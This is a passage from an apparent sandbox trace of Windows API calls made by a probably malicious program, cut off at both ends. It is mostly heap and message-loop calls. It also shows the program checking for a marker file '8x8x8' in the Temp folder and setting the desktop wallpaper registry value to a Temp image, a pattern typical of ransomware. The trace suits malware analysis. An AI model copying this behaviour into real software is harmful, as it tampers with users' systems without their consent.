hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0284.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0284.185] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0284.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0284.185] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0284.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0284.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0284.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0284.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0284.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0284.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0284.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0284.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0284.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0284.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0284.187] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0284.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0284.187] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0284.187] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0284.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0284.188] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0284.188] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0284.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0284.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0284.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0284.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0284.189] timeGetTime () returned 0x11872c1 [0284.189] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.189] Sleep (dwMilliseconds=0xa) [0284.268] timeGetTime () returned 0x1187310 [0284.268] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0284.268] TranslateMessage (lpMsg=0x8cf798) returned 0 [0284.268] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0284.268] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0284.268] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0284.269] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.269] Sleep (dwMilliseconds=0xa) [0284.347] timeGetTime () returned 0x118735f [0284.347] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.347] Sleep (dwMilliseconds=0xa) [0284.522] timeGetTime () returned 0x1187410 [0284.522] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.523] Sleep (dwMilliseconds=0xa) [0284.597] timeGetTime () returned 0x118745a [0284.597] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.597] Sleep (dwMilliseconds=0xa) [0284.667] timeGetTime () returned 0x11874a0 [0284.667] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.667] Sleep (dwMilliseconds=0xa) [0284.710] timeGetTime () returned 0x11874cb [0284.710] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.710] Sleep (dwMilliseconds=0xa) [0284.809] timeGetTime () returned 0x118752f [0284.809] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.809] Sleep (dwMilliseconds=0xa) [0284.847] timeGetTime () returned 0x1187555 [0284.847] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.847] Sleep (dwMilliseconds=0xa) [0284.883] timeGetTime () returned 0x1187577 [0284.883] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.883] Sleep (dwMilliseconds=0xa) [0284.920] timeGetTime () returned 0x118759c [0284.920] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.920] Sleep (dwMilliseconds=0xa) [0284.956] timeGetTime () returned 0x11875c0 [0284.956] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.956] Sleep (dwMilliseconds=0xa) [0284.995] timeGetTime () returned 0x11875e8 [0284.995] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0284.995] Sleep (dwMilliseconds=0xa) [0285.050] timeGetTime () returned 0x118761f [0285.050] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0285.050] TranslateMessage (lpMsg=0x8cf798) returned 0 [0285.050] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0285.050] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0285.050] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0285.050] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.050] Sleep (dwMilliseconds=0xa) [0285.086] timeGetTime () returned 0x1187643 [0285.086] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.086] Sleep (dwMilliseconds=0xa) [0285.122] timeGetTime () returned 0x1187668 [0285.122] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0285.122] Sleep (dwMilliseconds=0xa) [0285.193] timeGetTime () returned 0x11876af [0285.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0285.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0285.193] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0285.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0285.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0285.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0285.194] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0285.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0285.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0285.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0285.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0285.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0285.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0285.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0285.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0285.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0285.195] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0285.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0285.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0285.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0285.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0285.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0285.195] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0285.195] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0285.196] RegCloseKey (hKey=0x2d0) returned 0x0 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0285.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0285.196] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0285.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0285.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 